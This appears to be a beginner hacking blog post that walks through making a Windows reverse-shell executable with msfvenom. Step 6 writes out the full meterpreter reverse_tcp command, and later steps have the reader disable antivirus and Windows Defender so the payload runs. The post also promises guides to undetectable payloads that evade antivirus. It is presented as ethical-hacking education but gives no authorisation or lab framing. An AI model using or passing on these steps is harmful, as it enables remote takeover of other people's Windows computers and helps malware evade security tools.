-->

Ad Code

HOW TO MAKE PAYLOAD IN 2021|| MAKE WINDOWS PAYLOAD IN HINDI || EXPLAINED IN ENFLISH IN 2021

 

HOW TO MAKE PAYLOAD IN 2021|| MAKE WINDOWS PAYLOAD IN HINDI || EXPLAINED IN ENFLISH IN 2021

Hii guys this is TechWiki again with a new topic. This topic is for the persons who want to make their carrier in cyber security and Ethical Hacking.

In this topic we will learn how to make a payload. With the help of Linux terminal and codes. If you all don’t know that what is payload then you can go through my video click here(LINK).

Basically, PAYLOAD is a file made with some commands. And is widely used to hack and gain REMOTE ACESSS. We can get the remote access of any IOT device, with the help of payload.

But we should remember that a common or basic payload will not do these things for us. For that we need to make an undetectable payload which is quite difficult to make than the basic one.

Here in this article, I am going you to teach you how to make a simple and basic payload. Remember “slow and steady wins the race” this is the reason why I am starting with the simple one. And if you will give a good response in this then I will make a video and article to make an undetectable payload.

So, don’t forget to watch the videos on my YouTube channel click here, and like share and comment on my videos. Please support our blog to make more articles for you all.

So, without any further delay let’s get started….

Steps to make a simple payload—

Step1: Open Linux terminal.

Step2: Go to the place where you want to save your payload. Here I will go to desktop for that type “cd Desktop”.

Step3: Right click on the terminal and choose open terminal.

Step4: Type there “if config” and copy your IP address.

Step5: Come to the original terminal where we have to do the work.

Step6: Type “msfvenom -p windows/meterpreter/reverse_tcp LHOST=(paste here your ip adress) LPORT=(give 4444) -f exe> (give the name of your payload).exe"

Step7: Hit enter.

Step8: After few seconds the terminal will give you the message about the size and other information of the payload you made.

Step9: You will see the payload of name “PAYLOD.exe”. Here I have given its name payload that’s why here it came as payload.exe.

Step10: So, this was how we make a simple and basic payload for windows.

Now for checking that it really hacks the system or not you need to turn off the antivirus and windows defender on the windows system. Then run the payload there.


Note: - We have turned off antivirus and windows defender because our payload is simple and it cannot bypass these securities that’s why we turned them off. So, that it can run and we can check whether it works or not.

Now if we want to hack this windows system then we have to use the METASPLOIT FRAMEWORK and I want to make it clear that it is not possible to show here in written that how it works. But if you want me to make a video for that then you can comment me on the YouTube video of this article.

After that I will make a separate video tutorial and article to make you all understand. But this will only work if you will give me good response on my blog, its articles and on my YouTube videos.

Please don’t forget to watch its video I have explained there with the details.

There are many different ways of making payload but every time every method doesn’t work but this method is the only method through which you can even make more and better payloads that can bypass the antiviruses.

So, if you all want a broad concept on this topic than you will have to follow my words in order to gain the concept.

  THANK YOU FOR YOUR VALUABLE TIME!!

 

 

Post a Comment

0 Comments